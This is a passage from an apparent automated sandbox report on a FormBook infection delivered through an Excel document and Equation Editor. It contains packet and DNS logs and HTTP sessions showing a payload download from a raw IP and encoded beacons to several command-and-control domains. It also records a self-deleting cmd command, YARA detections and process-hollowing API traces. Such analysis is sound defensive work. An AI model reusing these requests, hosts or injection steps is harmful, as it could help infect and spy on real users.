                                                    Oct 13, 2021 20:15:52.952254057 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.952270031 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.955044985 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.955081940 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.955105066 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.955161095 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.955185890 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.955188990 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.955209017 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.955214024 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.955218077 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.955221891 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.955241919 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.955481052 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.955503941 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.955539942 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.955730915 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.955755949 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.955780029 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.955800056 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.955857992 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.955883026 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.955900908 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.955912113 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.956777096 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.956805944 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.956828117 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.956850052 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.956873894 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.956877947 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.956897020 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.956901073 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.956901073 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.956924915 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.956948996 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.956958055 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.956964970 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.956983089 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.956990957 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.957006931 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.957020998 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.957031965 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.957040071 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.957056046 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.957065105 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.957079887 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.957093954 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.957107067 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.957110882 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.957143068 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.957734108 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.957756996 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.957776070 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.957801104 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:17:35.798839092 CEST8049171172.67.213.229192.168.2.22
                                                    Oct 13, 2021 20:17:35.799060106 CEST4917180192.168.2.22172.67.213.229
                                                    Oct 13, 2021 20:17:35.799138069 CEST8049171172.67.213.229192.168.2.22
                                                    Oct 13, 2021 20:17:35.799217939 CEST4917180192.168.2.22172.67.213.229
                                                    Oct 13, 2021 20:17:35.814909935 CEST8049171172.67.213.229192.168.2.22

                                                    UDP Packets


                                                    DNS Queries

                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                    Oct 13, 2021 20:17:07.031924963 CEST | 192.168.2.22 | 8.8.8.8 | 0x8eb8 | Standard query (0) | www.ahljsm.com | A (IP address) | IN (0x0001)
                                                    Oct 13, 2021 20:17:12.415544987 CEST | 192.168.2.22 | 8.8.8.8 | 0xc18c | Standard query (0) | www.publicationsplace.com | A (IP address) | IN (0x0001)
                                                    Oct 13, 2021 20:17:17.814043045 CEST | 192.168.2.22 | 8.8.8.8 | 0xfc43 | Standard query (0) | www.dbe648.com | A (IP address) | IN (0x0001)
                                                    Oct 13, 2021 20:17:25.404551029 CEST | 192.168.2.22 | 8.8.8.8 | 0x9c63 | Standard query (0) | www.upinmyfeels.com | A (IP address) | IN (0x0001)
                                                    Oct 13, 2021 20:17:30.561172962 CEST | 192.168.2.22 | 8.8.8.8 | 0x30e0 | Standard query (0) | www.lacucinadesign.com | A (IP address) | IN (0x0001)
                                                    Oct 13, 2021 20:17:35.726414919 CEST | 192.168.2.22 | 8.8.8.8 | 0x9037 | Standard query (0) | www.restaurant-utopia.xyz | A (IP address) | IN (0x0001)

                                                    DNS Answers

                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                    Oct 13, 2021 20:17:07.055233002 CEST | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | No error (0) | www.ahljsm.com | | 45.39.212.162 | A (IP address) | IN (0x0001)
                                                    Oct 13, 2021 20:17:12.456072092 CEST | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | www.publicationsplace.com | emailforts.com | | CNAME (Canonical name) | IN (0x0001)
                                                    Oct 13, 2021 20:17:12.456072092 CEST | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | emailforts.com | | 108.170.14.102 | A (IP address) | IN (0x0001)
                                                    Oct 13, 2021 20:17:18.063297987 CEST | 8.8.8.8 | 192.168.2.22 | 0xfc43 | Name error (3) | www.dbe648.com | none | none | A (IP address) | IN (0x0001)
                                                    Oct 13, 2021 20:17:25.424546957 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | www.upinmyfeels.com | upinmyfeels.com | | CNAME (Canonical name) | IN (0x0001)
                                                    Oct 13, 2021 20:17:25.424546957 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | upinmyfeels.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                    Oct 13, 2021 20:17:30.583506107 CEST | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | www.lacucinadesign.com | lacucinadesign.com | | CNAME (Canonical name) | IN (0x0001)
                                                    Oct 13, 2021 20:17:30.583506107 CEST | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | lacucinadesign.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                    Oct 13, 2021 20:17:35.747865915 CEST | 8.8.8.8 | 192.168.2.22 | 0x9037 | No error (0) | www.restaurant-utopia.xyz | | 172.67.213.229 | A (IP address) | IN (0x0001)
                                                    Oct 13, 2021 20:17:35.747865915 CEST | 8.8.8.8 | 192.168.2.22 | 0x9037 | No error (0) | www.restaurant-utopia.xyz | | 104.21.35.47 | A (IP address) | IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • 18.197.254.181
                                                    • www.ahljsm.com
                                                    • www.publicationsplace.com
                                                    • www.upinmyfeels.com
                                                    • www.lacucinadesign.com
                                                    • www.restaurant-utopia.xyz

                                                    HTTP Packets

                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    0 | 192.168.2.22 | 49165 | 18.197.254.181 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Oct 13, 2021 20:15:52.835145950 CEST | 0 | OUT | GET /www1/deo.exe HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: 18.197.254.181
                                                    Connection: Keep-Alive


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    1 | 18.197.254.181 | 80 | 192.168.2.22 | 49165 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Oct 13, 2021 20:15:52.855649948 CEST | 1 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 13 Oct 2021 18:15:52 GMT
                                                    Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
                                                    Last-Modified: Wed, 13 Oct 2021 09:32:48 GMT
                                                    ETag: "73c00-5ce38a52a9832"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 474112
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-msdownload


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    2 | 192.168.2.22 | 49166 | 45.39.212.162 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Oct 13, 2021 20:17:07.242702007 CEST | 501 | OUT | GET /ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=IVc4rtgLgg2h/YWyhQBU9em9uNea1MXNkTy/UnYOuL+WBS8ayE+K1FYcvarTJ+yNk0kAEg== HTTP/1.1
                                                    Host: www.ahljsm.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Oct 13, 2021 20:17:07.413518906 CEST | 501 | IN | HTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Wed, 13 Oct 2021 18:17:05 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 371
                                                    Connection: close
                                                    Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    3 | 192.168.2.22 | 49167 | 108.170.14.102 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Oct 13, 2021 20:17:12.630357981 CEST | 502 | OUT | GET /ef6c/?pVE8Yvg8=69obzrOt3jvlXYYQLOBGpgM4gb/C38tuSyxXcmdwhPVCiSErrrcVtL+HOCZM5DtjL+Sksg==&OHT=xjWx_NuP96LhBV HTTP/1.1
                                                    Host: www.publicationsplace.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Oct 13, 2021 20:17:12.802043915 CEST | 502 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 13 Oct 2021 18:17:12 GMT
                                                    Server: Apache/2.2.15 (CentOS)
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ef6c/ was not found on this server.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    4 | 192.168.2.22 | 49169 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Oct 13, 2021 20:17:25.444068909 CEST | 504 | OUT | GET /ef6c/?pVE8Yvg8=qu0EmkGaX3geOx6lIkkYY+FXQg5rkMbAIJtI6DFSABpZ5nF28boqJyWYwUc9r+BjHdgUhg==&OHT=xjWx_NuP96LhBV HTTP/1.1
                                                    Host: www.upinmyfeels.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Oct 13, 2021 20:17:25.557760954 CEST | 504 | IN | HTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Wed, 13 Oct 2021 18:17:25 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "61672139-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    5 | 192.168.2.22 | 49170 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Oct 13, 2021 20:17:30.602564096 CEST | 505 | OUT | GET /ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=9TcXST3pnWOFoH1gaAmWVPk3OXoAybXjykt4lIGhEDNMUFCSIfL5p15n/WQr7vtpGgJ17Q== HTTP/1.1
                                                    Host: www.lacucinadesign.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Oct 13, 2021 20:17:30.718043089 CEST | 505 | IN | HTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Wed, 13 Oct 2021 18:17:30 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "61672139-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    6 | 192.168.2.22 | 49171 | 172.67.213.229 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Oct 13, 2021 20:17:35.773063898 CEST | 506 | OUT | GET /ef6c/?pVE8Yvg8=QQd8BU9Cv5cEIYl4k4pKDxcRFm34j4nz3hSoRKYyqec7FRTFu3B5N6xNIoSikzbYbjb12w==&OHT=xjWx_NuP96LhBV HTTP/1.1
                                                    Host: www.restaurant-utopia.xyz
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Oct 13, 2021 20:17:35.798839092 CEST | 507 | IN | HTTP/1.1 301 Moved Permanently
                                                    Date: Wed, 13 Oct 2021 18:17:35 GMT
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Cache-Control: max-age=3600
                                                    Expires: Wed, 13 Oct 2021 19:17:35 GMT
                                                    Location: https://www.restaurant-utopia.xyz/ef6c/?pVE8Yvg8=QQd8BU9Cv5cEIYl4k4pKDxcRFm34j4nz3hSoRKYyqec7FRTFu3B5N6xNIoSikzbYbjb12w==&OHT=xjWx_NuP96LhBV
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8N9tMGYALV79iE%2FeL51FVIuI8Gp1jK7n6KTOZIE%2Bj9%2BqgxSWxk5JN%2BajX3YZ6hX4EhWE5OQUZVxUwBeJF5Iiy6iNACHH89o%2FadrnvQs4cXwOCEy2RUvq5Awu8yg2uKJ0zaSPSo1nf5T85IbM"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 69da90ce9caf5b7a-FRA
                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                    Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    System Behavior

                                                    General

                                                    Start time:20:15:24
                                                    Start date:13/10/2021
                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                    Imagebase:0x13f450000
                                                    File size:28253536 bytes
                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    General

                                                    Start time:20:15:45
                                                    Start date:13/10/2021
                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                    Imagebase:0x400000
                                                    File size:543304 bytes
                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:20:15:47
                                                    Start date:13/10/2021
                                                    Path:C:\Users\Public\vbc.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\Public\vbc.exe'
                                                    Imagebase:0xd60000
                                                    File size:474112 bytes
                                                    MD5 hash:6429AA83E4BC083B4F0B3F44B0D7950F
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Start time:20:15:52
                                                    Start date:13/10/2021
                                                    Path:C:\Users\Public\vbc.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\Public\vbc.exe
                                                    Imagebase:0xd60000
                                                    File size:474112 bytes
                                                    MD5 hash:6429AA83E4BC083B4F0B3F44B0D7950F
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Start time:20:15:53
                                                    Start date:13/10/2021
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0xffa10000
                                                    File size:3229696 bytes
                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:high

                                                    General

                                                    Start time:20:16:18
                                                    Start date:13/10/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\cmd.exe
                                                    Imagebase:0x4a730000
                                                    File size:302592 bytes
                                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:high

                                                    General

                                                    Start time:20:16:22
                                                    Start date:13/10/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                    Imagebase:0x4a730000
                                                    File size:302592 bytes
                                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Disassembly

                                                    Code Analysis

                                                      Executed Functions

                                                      APIs
                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0025C3EF
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.478069581.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 9735e8d00c79c4e84251b49403c8f2e6f24297fe9d0d2e7bc67af53ce9197ce2
                                                      • Instruction ID: 2da194ffef6ec5b5d9a6e9f204b640fed8399bfaa7a9fcddd57f41fd98369767
                                                      • Opcode Fuzzy Hash: 9735e8d00c79c4e84251b49403c8f2e6f24297fe9d0d2e7bc67af53ce9197ce2
                                                      • Instruction Fuzzy Hash: 24C12870D1022D8FCB20DFA4C841BEDBBB1BF49304F1095A9E919B7240EB749A99CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025BE63
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.478069581.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: ad6aac7eb034b574d3581993a0236d40d76b2074cdb4896b36a9df9d11183080
                                                      • Instruction ID: 1db4832c64eb65ddb2642c0e6ebcdc4347206c95dc84afa9d81ffd1760e7e6dd
                                                      • Opcode Fuzzy Hash: ad6aac7eb034b574d3581993a0236d40d76b2074cdb4896b36a9df9d11183080
                                                      • Instruction Fuzzy Hash: CB41B8B4D002489FCF00CFA9D884AEEBBF1BF49304F24942AE814B7200D774AA55CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025BFA2
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.478069581.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 0fc277f7701642907c008bdd45a218b00157aefecd1732485094e06be0f98dae
                                                      • Instruction ID: c56e89bdd5a190af3752691a923632195ff1836494758a7fb37531e8604829fd
                                                      • Opcode Fuzzy Hash: 0fc277f7701642907c008bdd45a218b00157aefecd1732485094e06be0f98dae
                                                      • Instruction Fuzzy Hash: 8C41B8B5D042589FCF00CFA9D884AEEFBB1BF49310F20942AE814B7200D775A955CFA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0025BD12
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.478069581.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: cc295272930a94b09bfb05beccae5d670f4f8e424f76ca514ef6a8dd2ff04f5b
                                                      • Instruction ID: 348dae5f971abec7abfdb3c882272110dd212d6bb8194dd0a090e6766be4d8fa
                                                      • Opcode Fuzzy Hash: cc295272930a94b09bfb05beccae5d670f4f8e424f76ca514ef6a8dd2ff04f5b
                                                      • Instruction Fuzzy Hash: 804199B5D042589BCF10CFA9D884AEEBBB1FF49310F20942AE815B7210D775A915CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0025BBE7
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.478069581.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: 1f3644f5fa8d6acec830442c8c47a41f7764d1fa69a9e5fdc0d40e528e6cbe63
                                                      • Instruction ID: ad945e26fd6c2398291d2935c81d100712fdb6dab2dfca9639270d8addb8ebfb
